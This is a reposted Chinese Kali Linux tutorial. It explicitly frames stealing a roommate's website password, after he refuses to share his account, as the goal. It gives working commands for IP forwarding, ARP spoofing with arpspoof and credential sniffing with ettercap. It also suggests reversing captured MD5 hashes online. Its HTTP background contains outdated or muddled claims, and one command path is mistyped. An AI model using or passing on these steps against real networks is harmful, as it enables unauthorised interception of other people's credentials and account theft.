安基网 首页 安全 渗透测试 查看内容

Kali Linux学习篇:如何使用Kali Linux获取http协议账户密码?

2019-6-2 11:24| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: HTTP介绍HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的 ...

HTTP介绍

HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。

HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。

HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系统。它于1990年提出,经过几年的使用与发展,得到不断地完善和扩展。目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中,而且HTTP-NG(Next Generation of HTTP)的建议已经提出。

HTTP协议工作于客户端-服务端架构为上。浏览器作为HTTP客户端通过URL向HTTP服务端即WEB服务器发送所有请求。Web服务器根据接收到的请求后,向客户端发送响应信息。

主要特点

1、简单快速:客户向服务器请求服务时,只需传送请求方法和路径。请求方法常用的有GET、HEAD、POST。每种方法规定了客户与服务器联系的类型不同。由于HTTP协议简单,使得HTTP服务器的程序规模小,因而通信速度很快。

2、灵活:HTTP允许传输任意类型的数据对象。正在传输的类型由Content-Type加以标记。

3.无连接:无连接的含义是限制每次连接只处理一个请求。服务器处理完客户的请求,并收到客户的应答后,即断开连接。采用这种方式可以节省传输时间。

4.无状态:HTTP协议是无状态协议。无状态是指协议对于事务处理没有记忆能力。缺少状态意味着如果后续处理需要前面的信息,则它必须重传,这样可能导致每次连接传送的数据量增大。另一方面,在服务器不需要先前信息时它的应答就较快。

5、支持B/S及C/S模式。

情景假设

寝室兄弟在用电脑登录某个网站,并且它是那个网站的会员,而那个网站有些资源一直是你想要下载的,跟他问了几次叫他把账号借你用,他就是不肯,这时,你就可以用我下面的方法,获取他的账号密码啦。

理论方法

用kali虚拟机对基友电脑实施IP流量转发,让他的电脑流量经过你的kali。

具体方法

1.设置转发机制,在kali中输入一下内容并回车。

echo 1 >proc/sys/net/ipv4/ip_forward

2.回显第一步转发确认,在kali中输入一下代码并回车。

cat /proc/sys/net/ipv4/ip_forward

回显“1”说明第一步开启流量转发已经成功运行

3.既然要让电脑乖乖的转发自己的流量,就要让他有一种你电脑就是他要去的假象,这一步要开启ARP欺骗。另启一个窗口,输入一下代码并回车。

arpspoof -i eth0 -t 192.168.1.112 192.168.1.1

arp欺骗

4.再启一个窗口,输入一下内容并回车。

ettercap -Tq -i eth0

开始验证

1.打开浏览器,比如我打开了kali的一个论坛http://defcon.cn/,它的登录时http协议加密的。我使用的火狐浏览器,在网页URL处直接有个感叹号的锁,就说明这个网站使用的http协议。

2.我在登录的名称密码都输入chenjie,看kali的效果。

kali直接将键盘录入的按键信息记录下来了!

总结

1.经论坛说明和亲自测试,有时候kali显示的密码和账户是经hash加密后的16位数字,这只需要在网上找反编译的网站就可以反编译成明文账户密码啦,上个学期学的《密码学》课程有解释各种加密的基本流程,md5简单的加密可以算出来密文,要是反推还是要借助电脑的。

2.这个测试是在局域网中进行的。


学习更多Kali Linux实战视频课程,可点击【了解更多】,精彩继续!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6697432984577901064/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部